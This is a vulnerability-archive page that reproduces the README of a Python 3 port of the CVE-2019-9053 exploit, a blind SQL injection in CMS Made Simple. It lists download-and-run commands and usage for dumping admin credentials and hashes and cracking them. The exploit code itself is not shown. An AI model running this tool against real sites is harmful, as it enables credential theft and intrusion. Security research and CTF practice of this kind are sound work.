Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2019-9053 PoC — CMS Made Simple SQL注入漏洞

Source
https://github.com/del0x3/CVE-2019-9053-port-py3
Associated Vulnerability
Title:CMS Made Simple SQL注入漏洞 (CVE-2019-9053)
Description:An issue was discovered in CMS Made Simple 2.2.8. It is possible with the News module, through a crafted URL, to achieve unauthenticated blind time-based SQL injection via the m1_idlist parameter.
Description
CVE-2019-9053.
Readme
# CVE-2019-9053 Exploit - Python 3

This is a Python 3 port of the CVE-2019-9053 exploit, which targets CMS Made Simple (CMSMS) versions before 2.2.10. The vulnerability allows for SQL injection through the News module interface.
## Example Output
Tested on the [TryHackMe Simple CTF Challenge](https://tryhackme.com/room/easyctf).

![Exploit Output](images/image.png)

## Description

The exploit takes advantage of a SQL injection vulnerability in the CMS Made Simple News module. It can:
- Extract the CMS salt
- Dump admin username
- Dump admin email
- Dump admin password hash
- Optionally crack the password using a provided wordlist

## Quick Start

Download and run quickly using these commands:

```bash
# Download the exploit
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py

# Download requirements
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt

# Install requirements
pip install -r requirements.txt

# Make exploit executable
chmod +x exploit.py

# Run the exploit
./exploit.py -u http://target.com/cms
```

Alternative using wget:
```bash
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt
pip install -r requirements.txt
chmod +x exploit.py
./exploit.py -u http://target.com/cms
```

## Requirements

- Python 3.6+
- Required packages (see requirements.txt)

## Installation

1. Clone this repository:
```bash
git clone https://github.com/del0x3/CVE-2019-9053-port-py3.git
cd CVE-2019-9053-port-py3
```

2. Install the required packages:
```bash
pip install -r requirements.txt
```

## Usage

Basic usage:
```bash
python3 exploit.py -u http://target.com/cms
```

With password cracking:
```bash
python3 exploit.py -u http://target.com/cms -c -w /path/to/wordlist.txt
```

### Arguments

- `-u, --url`: Base target URL (required)
- `-w, --wordlist`: Path to wordlist for password cracking
- `-c, --crack`: Enable password cracking mode

## Disclaimer

This tool is for educational and security research purposes only. Do not use it against systems without explicit permission.

## Credits

- Original exploit by Daniele Scanu
- Python 3 port by Del0x3

## License

MIT License
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →